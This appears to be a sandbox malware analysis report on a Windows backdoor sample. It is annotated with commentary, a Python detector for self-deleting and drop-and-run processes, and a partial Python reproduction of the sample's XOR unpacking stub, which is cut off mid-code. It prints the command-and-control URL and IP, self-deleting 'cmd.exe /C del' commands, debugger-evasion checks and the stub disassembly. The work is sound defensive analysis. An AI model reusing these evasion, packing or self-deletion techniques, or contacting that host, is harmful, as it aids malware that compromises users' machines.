Source: C:\Windows\SysWOW64\WinH83.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-1585
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-1353
Source: C:\Windows\SysWOW64\WinH83.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-1319
Source: C:\Windows\SysWOW64\WinH83.exeAPI coverage: 9.7 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe TID: 6932Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exe TID: 3624Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeThread delayed: delay time: 1800000Jump to behavior
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`I]%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeAPI call chain: ExitProcess graph end nodegraph_0-1670
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeAPI call chain: ExitProcess graph end nodegraph_0-1497
Source: C:\Windows\SysWOW64\WinH83.exeAPI call chain: ExitProcess graph end nodegraph_1-1455
Source: C:\Windows\SysWOW64\WinH83.exeAPI call chain: ExitProcess graph end nodegraph_1-1628
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040D07E LoadLibraryA, GetProcAddress, EntryPoint, DeleteFileA | 0_2_0040D07E
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040D07E mov eax, dword ptr fs:[00000030h] | 0_2_0040D07E
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_0040D06A mov eax, dword ptr fs:[00000030h] | 0_2_0040D06A
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401030 mov eax, dword ptr fs:[00000030h] | 0_2_00401030
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401030 mov eax, dword ptr fs:[00000030h] | 0_2_00401030
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00401030 mov eax, dword ptr fs:[00000030h] | 0_2_00401030
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_004071E2 mov eax, dword ptr fs:[00000030h] | 0_2_004071E2
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040D07E mov eax, dword ptr fs:[00000030h] | 1_2_0040D07E
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_0040D06A mov eax, dword ptr fs:[00000030h] | 1_2_0040D06A
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00401030 mov eax, dword ptr fs:[00000030h] | 1_2_00401030
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00401030 mov eax, dword ptr fs:[00000030h] | 1_2_00401030
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_00401030 mov eax, dword ptr fs:[00000030h] | 1_2_00401030
Source: C:\Windows\SysWOW64\WinH83.exe | Code function: 1_2_004071E2 mov eax, dword ptr fs:[00000030h] | 1_2_004071E2
(fs:[30h] is the PEB; identical addresses in both processes show WinH83.exe is a byte-for-byte relaunch of the same code, not a second-stage payload.)
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\WinH83.exe "C:\Windows\system32\WinH83.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Note: the command lines name system32 but the images live in SysWOW64 because the dropper is a 32-bit process and WoW64 file-system redirection maps its System32 writes and launches there; on a 64-bit host the payload never touches the real C:\Windows\System32. Both stages erase their own file through cmd.exe /C del ... > nul (SECURI~1.EXE is the 8.3 alias of the dropper's own file name), which is what the "Deletes itself after installation" signature reports.
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | Code function: 0_2_00402CB0 RegOpenKeyExA, RegQueryValueExA, RegCloseKey, _strnicmp, _strnicmp, GetVersionExA, wsprintfA, GlobalMemoryStatusEx, _ui64toa, GetSystemDefaultUILanguage | 0_2_00402CB0
Note: in the execution graph this function (402cb0) is reached from 40265e, directly after the connect at 4025fa and before the send at 402682, so the registry value, OS version, physical memory size and UI language it collects make up the host fingerprint of the first check-in.
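The two behaviours above, a payload dropped into a system directory and started by a user-profile process, and a parent erasing its own image through cmd.exe /C del with an 8.3 alias, are cheap to detect in process-creation telemetry. The checker below is an added example and not part of the Joe Sandbox report: the event shape (ProcEvent), the regexes, the allow-list and the sample events modelled on the four processes in this report are my own constructions, and the 8.3 alias derivation is an approximation of the Windows algorithm (enough for names like SECURI~1.EXE, not for collisions beyond ~9).

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 or EDR equivalent).
    Field names are assumptions; map them onto your telemetry schema."""
    image: str
    cmdline: str
    parent_image: str


# "cmd.exe /C del <path> > nul": capture the path being deleted.
DEL_RE = re.compile(r'/c\s+del\s+"?([^"\s>]+)"?', re.IGNORECASE)
# Images in the Windows system directories (64-bit view and the WoW64 view).
SYSDIR_RE = re.compile(r'^[a-z]:\\windows\\(system32|syswow64)\\', re.IGNORECASE)
USERDIR_RE = re.compile(r'^[a-z]:\\users\\', re.IGNORECASE)
# Shape of an 8.3 alias: up to six stem characters, "~", digits, optional 3-char extension.
SHORT_RE = re.compile(r'([^~\\]{1,6})~\d+(?:\.(\w{0,3}))?', re.IGNORECASE)
# System binaries a user-profile process may legitimately spawn; extend for your estate.
KNOWN_SYSTEM_BINARIES = {'cmd.exe', 'conhost.exe', 'notepad.exe', 'rundll32.exe'}


def short_stem(filename: str) -> str:
    """Stem of the 8.3 alias Windows derives from a long name: spaces and all
    dots but the last are dropped, the first six characters are kept and
    upper-cased. 'SecuriteInfo.com.BackDoor.X.exe' -> 'SECURI'."""
    stem, dot, _ext = filename.rpartition('.')
    if not dot:
        stem = filename
    return stem.replace(' ', '').replace('.', '')[:6].upper()


def names_match(target: str, parent_image: str) -> bool:
    """True when the deleted path names the parent's own executable, either
    verbatim or through its 8.3 alias (SECURI~1.EXE for SecuriteInfo....exe)."""
    t_dir, t_name = ntpath.split(target)
    p_dir, p_name = ntpath.split(parent_image)
    if t_dir.lower() != p_dir.lower():
        return False
    if t_name.lower() == p_name.lower():
        return True
    m = SHORT_RE.fullmatch(t_name)
    if not m:
        return False
    p_ext = p_name.rpartition('.')[2][:3] if '.' in p_name else ''
    return (m.group(1).upper() == short_stem(p_name)
            and (m.group(2) or '').upper() == p_ext.upper())


def analyse(events):
    """Return one finding string per suspicious event, in event order."""
    findings = []
    for ev in events:
        base = ntpath.basename(ev.image).lower()
        if base == 'cmd.exe':
            m = DEL_RE.search(ev.cmdline)
            if m and names_match(m.group(1), ev.parent_image):
                findings.append(f'self-delete: {ev.parent_image} ran "{ev.cmdline}"')
        elif (base not in KNOWN_SYSTEM_BINARIES
              and SYSDIR_RE.match(ev.image) and USERDIR_RE.match(ev.parent_image)):
            # An unknown binary in System32/SysWOW64 started by something under
            # a user profile: the drop-to-Windows-directory-and-run pattern.
            findings.append(f'system-dir drop-and-run: {ev.image} spawned by {ev.parent_image}')
    return findings


# Constructed events mirroring the process tree of this report, plus one benign control.
SAMPLE = r'C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe'
DROPPED = r'C:\Windows\SysWOW64\WinH83.exe'
EVENTS = [
    ProcEvent(SAMPLE, f'"{SAMPLE}"', r'C:\Windows\explorer.exe'),
    ProcEvent(DROPPED, r'"C:\Windows\system32\WinH83.exe"', SAMPLE),
    ProcEvent(r'C:\Windows\SysWOW64\cmd.exe',
              r'C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul', SAMPLE),
    ProcEvent(r'C:\Windows\SysWOW64\cmd.exe',
              r'C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul', DROPPED),
    ProcEvent(r'C:\Windows\System32\cmd.exe',
              r'cmd.exe /C del C:\Users\user\AppData\Local\Temp\tmp1.log > nul', r'C:\Windows\explorer.exe'),
]

if __name__ == '__main__':
    for finding in analyse(EVENTS):
        print(finding)
```

The directory comparison in names_match is what keeps the benign control quiet: a user deleting a temp file through cmd.exe has explorer.exe as parent and a target outside explorer's directory. Matching on the 8.3 stem rather than the literal name matters because Windows hands the alias to cmd.exe when the long name contains several dots, as it does here.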
MITRE ATT&CK matrix, flattened to one line per tactic in the column order the report renders. A bracketed number is the count badge the matrix shows next to a matched technique; entries without one are the unmatched cells of the fixed template grid.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Service Execution [12]; Native API [12]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Windows Service [14]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation [1]; Windows Service [14]; Process Injection [11]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [12]; Virtualization/Sandbox Evasion [21]; Access Token Manipulation [1]; Process Injection [11]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]; File Deletion [1]
Credential Access: Credential API Hooking [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [1]; Virtualization/Sandbox Evasion [21]; File and Directory Discovery [1]; System Information Discovery [2]; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Credential API Hooking [1]; Archive Collected Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [11]; Non-Application Layer Protocol [1]; Application Layer Protocol [1]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1657698 | Sample: SecuriteInfo.com.BackDoor.D... | Start date: 06/04/2025 | Architecture: WINDOWS | Score: 88

Root node (2):
  DNS/IP: www.003zzy.com
  Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; PE file has a writeable .text section; May modify the system service descriptor table (often done to hook functions)
  Started: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe (node 8)

Process node 8, SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe:
  DNS/IP: www.003zzy.com, 5.79.71.225:80, LEASEWEB-NL-AMS-01 Netherlands (NL)
  Dropped: C:\Windows\SysWOW64\WinH83.exe (PE32); C:\Windows\...\WinH83.exe:Zone.Identifier (ASCII)
  Signatures: Found evasive API chain (may stop execution after checking mutex); Drops executables to the windows directory (C:\Windows) and starts them; May modify the system service descriptor table (often done to hook functions); Deletes itself after installation
  Started: WinH83.exe (node 13); cmd.exe (node 16)

Process node 13, WinH83.exe:
  Signatures: Antivirus detection for dropped file; Found evasive API chain (may stop execution after checking mutex); Found stalling execution ending in API Sleep call; 2 other signatures
  Started: cmd.exe (node 18)

Source | Detection | Scanner | Label
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | 70% | Virustotal | 
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | 78% | ReversingLabs | Win32.Backdoor.Farfli
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe | 100% | Avira | TR/Crypt.XPACK.Gen
Source | Detection | Scanner | Label
C:\Windows\SysWOW64\WinH83.exe | 100% | Avira | TR/Crypt.XPACK.Gen
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.003zzy.com/ad1in.htmC | 0% | Avira URL Cloud | safe
http://www.003zzy.com/ad1in.htms? | 0% | Avira URL Cloud | safe
http://www.003zzy.com/ad1in.htmC: | 0% | Avira URL Cloud | safe
http://www.003zzy.com/ad1in.htm | 0% | Avira URL Cloud | safe
http://www.003zzy.com/ad1in.htmhv | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.003zzy.com | 5.79.71.225 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.003zzy.com/ad1in.htm | SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
http://www.003zzy.com/ad1in.htmC | SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.google.com | WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | false | | high
http://www.003zzy.com/ad1in.htmC: | SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
http://www.003zzy.com/ad1in.htmhv | SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.003zzy.com/ad1in.htms? | SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Note: the variants ending in C, C:, hv and s? are the same URL with the bytes that happen to follow it in memory swept up by the string scanner; the indicator to act on is http://www.003zzy.com/ad1in.htm. It is found in the 0x401000 image region (the decrypted .text) of both the sample and WinH83.exe, so it is embedded configuration, not something fetched at runtime. "Avira URL Cloud: safe" is a reputation lookup at analysis time and says nothing about what the page serves.
IP | Domain | Country | ASN | ASN Name | Malicious
5.79.71.225 | www.003zzy.com | Netherlands | 60781 | LEASEWEB-NL-AMS-01 Netherlands NL | false
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1657698
      Start date and time:2025-04-06 09:30:31 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 3m 20s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      Detection:MAL
      Classification:mal88.evad.winEXE@8/4@1/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 15
      • Number of non-executed functions: 93
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Excluded IPs from analysis (whitelisted): 184.31.69.3
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net
• Not all processes were analysed; the report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:31:26 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe modified
03:31:32 | API Interceptor | 1x Sleep call for process: WinH83.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.79.71.225 | 7778FcwhJz.exe | malicious | Shiz | xudylenyrob.eu/login.php
5.79.71.225 | OjKmJJm2YT.exe | malicious | Simda Stealer | gatyfus.com/login.php
5.79.71.225 | Bonelessness.exe | malicious | Simda Stealer | gatyfus.com/login.php
5.79.71.225 | file.exe | malicious | Unknown | www.kukutrustnet7.info/t_100_v400/?rnd=1278909843&id=632934364559
5.79.71.225 | yjsdMJTchO.exe | malicious | Pony | therepherpe.ru/zapoy/gate.php
Note: these are earlier submissions that contacted the same IP, not the same family; on a hoster like LeaseWeb an address is re-let, so treat the overlap as a reputation hint for the IP rather than as attribution.
      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LEASEWEB-NL-AMS-01 Netherlands NL | mips.elf | malicious | Mirai | 85.17.24.184
LEASEWEB-NL-AMS-01 Netherlands NL | utorrent_installer.exe | malicious | Unknown | 178.162.174.75
LEASEWEB-NL-AMS-01 Netherlands NL | utorrent_installer.exe | malicious | Unknown | 178.162.173.144
LEASEWEB-NL-AMS-01 Netherlands NL | Shipping Documents.pdf.exe | malicious | GuLoader | 95.211.44.250
LEASEWEB-NL-AMS-01 Netherlands NL | http://cdn.systweak.com/downloads/setups/dpfw/dpfsetup_afterupdate_1004.exe | malicious | PureLog Stealer, zgRAT | 5.79.122.22
LEASEWEB-NL-AMS-01 Netherlands NL | .i.elf | malicious | Mirai | 5.79.83.114
LEASEWEB-NL-AMS-01 Netherlands NL | jade420.arm.elf | malicious | Mirai | 31.186.168.37
LEASEWEB-NL-AMS-01 Netherlands NL | http://update.hobiter.com | malicious | Unknown | 85.17.31.122
LEASEWEB-NL-AMS-01 Netherlands NL | drea4.elf | malicious | Gafgyt, Mirai | 95.211.189.197
LEASEWEB-NL-AMS-01 Netherlands NL | http://www.greendon.com/ | malicious | Unknown | 95.211.219.66
      No context
      No context
      Process:C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):50382421
      Entropy (8bit):4.8397788165428794
      Encrypted:false
      SSDEEP:
      MD5:C7B758D198A32EF2BA4112EF346C74BA
      SHA1:0B7EF8BC77C32AFD14EFF2C624F2BFE3221E9216
      SHA-256:BA4F9F2FF33C114E082151EC91E23EE287028BBD08A11F1CB29CE410C9EE49C1
      SHA-512:2036B63BA3322903A8C00DCDACADB082AB1021834FD771E7EB9B53139C9AEC2510D613EA12C9EA8F7A20155B8B95331491640D651FE84DDFA36723ECBA3F5C37
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........g...g...g...{...g..9{...g..EG...g..EG...g...g..2g..yh...g..Rx...g..}a...g..Rich.g..........................PE..L.....FJ[LordPE].............P......~........`....@.........................................................................E........................................................................................................................text....H.......J.................. ....rdata.......`.......N..............@....data...<+...p.......\..............@....mackt...............v..............`....vmp0............................... .. .reloc..............................@..B300................................. ....Katja..............................@....rsrc.... ..........................@..@........................................................................................................................................................
      Process:C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview:[ZoneTransfer]....ZoneId=0
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):32
      Entropy (8bit):4.351409765557392
      Encrypted:false
      SSDEEP:3:oX6S0rvn:oXY7n
      MD5:9E990DB6A2F50100468FA41138047EB7
      SHA1:7ECCFF3574EF5B5A7CDC7725E470BE1D3A5DADBB
      SHA-256:0A0E4C2B943BC5777613B57E09283F372754CBFDB60B101B60C7F45C61F3DC24
      SHA-512:7BC71FF3625449E14CECBE69AC1043A6AF807B3310B7AC91021FDF6EBB07676157EEFD0C9473C3B96B1621C4E90351D2B4EC254DEE837865C0C96C2C5729C11D
      Malicious:false
      Reputation:low
      Preview:C:\Windows\SysWOW64\WinH83.exe..
      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):4.8002840680985805
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      File size:25'208'853 bytes
      MD5:4194ba809c07479d0b6c3681d218661b
      SHA1:2e8c858633dd5d519d8a7231150ddbc24fef2675
      SHA256:666e5e939aca03a8c323fc257063430fbab202f6ae1c4bf8c04fe62c75dade4b
      SHA512:d1fdbf68fe48122eb3150bab37d6e61a4a1461b3211e653093aa5f4a387275e36551a5969764e3dba4b603025a36803f03eade1c48c33db64c180e89f1e98521
      SSDEEP:768:Epynh7s4ofEwaGHxAL/IoqATi+N1YMv47DUQYUbv8HU2LsNNkm9QIPwAHS:Epyh7FofEwjMI1ATiAP4RYUfKmlPRS
      TLSH:3E4722443EDE5816FBDB9933407F3DA6702F405C558FB22B89D96216B4F103A0AFD1AA
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g...g...g...{...g..9{...g..EG...g..EG...g...g..2g..yh...g..Rx...g..}a...g..Rich.g..........................PE..L.....FJ[Lo
      Icon Hash:b2b239396d33f051
      Entrypoint:0x40d07e
      Entrypoint Section:300
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      DLL Characteristics:
      Time Stamp:0x4A4601AD [Sat Jun 27 11:25:33 2009 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:75a7edd5e27e3873db683bbba6fe50dc
Instruction (disassembly at the entry point 0x40d07e, section 300)
      pushad
      mov dword ptr [0040D068h], ecx
      push 0040D002h
      call dword ptr [0040E056h]
      mov eax, dword ptr [0040D068h]
      cmp eax, ecx
      je 00007F66B522E5C8h
      popad
      nop
      nop
      nop
      nop
      mov eax, dword ptr fs:[00000030h]
      nop
      mov eax, dword ptr [eax+18h]
      nop
      mov eax, dword ptr [eax+0Ch]
      cmp eax, 02h
      je 00007F66B522E62Dh
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      ret
      nop
      nop
      nop
      pushad
      call 00007F66B522E625h
      pop ebx
      xor bx, bx
      add ebx, 00001000h
      push 000002F4h
      pop ecx
      mov eax, dword ptr [ebx]
      xor eax, 22DD55EEh
      mov dword ptr [ebx], eax
      add ebx, 04h
      loop 00007F66B522E614h
      popad
      nop
      nop
      pushad
      call 00007F66B522E625h
      pop ebx
      xor bx, bx
      add ebx, 00001CDCh
      push 000019D1h
      pop ecx
      mov eax, dword ptr [ebx]
      xor eax, 22DD55EEh
      mov dword ptr [ebx], eax
      add ebx, 04h
      loop 00007F66B522E614h
      popad
      nop
      pushad
      call 00007F66B522E625h
      pop ebx
      xor bx, bx
      add ebx, 000085ECh
      push 00000101h
      pop ecx
      mov eax, dword ptr [ebx]
      xor eax, 22DD55EEh
      mov dword ptr [ebx], eax
      add ebx, 04h
      loop 00007F66B522E614h
      popad
      mov dword ptr [00401E76h], FFFFFD67h
      jmp 00007F66B522E4FEh
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
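The listing above is the unpacking stub that lives in section 300. After the first check, each of the three pushad ... loop ... popad blocks does the same thing: call $+5 / pop ebx loads the stub's own address, xor bx, bx clears its low 16 bits (0x40Dxxx becomes the image base 0x400000), add ebx, N moves to an RVA, and the loop XORs ecx dwords with 0x22DD55EE. The three ranges are RVA 0x1000 for 0x2F4 dwords (the head of .text), 0x1CDC for 0x19D1 dwords (the rest of .text, all of .rdata and the first part of .data) and 0x85EC for 0x101 dwords (a slice of .data); this is why .text is writeable and why its entropy is 7.18 on disk. The mov dword ptr [401E76h], FFFFFD67h just before the final jmp is a fix-up written after decryption. Jump targets in the listing are printed against a dummy base, so the original entry point reached by that jmp cannot be read off the page. Before decrypting, the stub reads the PEB (fs:[30h]), follows ProcessHeap (+18h) and compares the dword at +0Ch with 2: on the Windows XP heap layout a 2009 build would target, that field is HEAP.Flags and 2 is HEAP_GROWABLE, the value an undebugged process shows, so a debugger-created heap makes the stub ret without ever decrypting.

The Python below, an added example that is not part of the Joe Sandbox report, reproduces the three loops and the fix-up on an RVA-indexed image: a dump taken at 0x400000, or a file whose sections you have laid out at their virtual addresses (raw file offsets are not in the report, so that mapping is left to the caller). The constants come from the listing; the function names and the buffer convention are my own.

```python
import struct

# Constants copied from the entry-point listing (section 300).
IMAGE_BASE = 0x400000          # PE ImageBase; the stub derives it with "xor bx, bx"
XOR_KEY = 0x22DD55EE           # key applied to every dword by "xor eax, 22DD55EEh"
# (RVA, number of dwords) for the three "loop" blocks, in execution order.
SCHEDULE = ((0x1000, 0x2F4), (0x1CDC, 0x19D1), (0x85EC, 0x101))
# Fix-up the stub stores right before jumping to the original entry point.
PATCH_VA, PATCH_VALUE = 0x401E76, 0xFFFFFD67


def covered_ranges():
    """Byte ranges [start, end) in RVA space that the XOR loops rewrite."""
    return [(rva, rva + 4 * count) for rva, count in SCHEDULE]


def xor_ranges(image: bytearray) -> bytearray:
    """Apply the stub's XOR loops to an RVA-indexed image buffer. XOR with a
    fixed key is its own inverse, so the same call encodes and decodes."""
    out = bytearray(image)
    for start, end in covered_ranges():
        if end > len(out):
            raise ValueError(f"image too small for range {start:#x}-{end:#x}")
        for off in range(start, end, 4):          # "add ebx, 4" / "loop"
            (value,) = struct.unpack_from("<I", out, off)
            struct.pack_into("<I", out, off, value ^ XOR_KEY)
    return out


def decrypt_image(image: bytearray, image_base: int = IMAGE_BASE) -> bytearray:
    """Reproduce the whole stub: decode the three ranges, then write the
    fix-up dword at 0x401E76 exactly as the stub does after the last loop."""
    out = xor_ranges(image)
    struct.pack_into("<I", out, PATCH_VA - image_base, PATCH_VALUE)
    return out


if __name__ == "__main__":
    import sys
    # Input must be RVA-indexed (e.g. a memory dump of the image at 0x400000),
    # not the raw file: section raw offsets differ from their virtual addresses.
    with open(sys.argv[1], "rb") as f:
        dump = bytearray(f.read())
    with open(sys.argv[1] + ".dec", "wb") as f:
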